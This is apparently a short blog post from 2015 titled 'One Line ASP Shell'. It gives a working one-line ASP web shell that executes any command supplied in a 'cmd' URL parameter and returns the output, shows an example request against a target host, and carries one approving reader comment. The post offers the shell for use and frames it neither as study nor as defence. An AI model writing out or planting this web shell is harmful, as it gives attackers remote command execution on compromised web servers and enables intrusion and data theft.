Tuesday, July 14, 2015

One Line ASP Shell

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
Request with http://target/shell.asp?cmd=ipconfig

1 comment:

  1. Thanks for the tip, it came in handy. Much appreciated :D

    ReplyDelete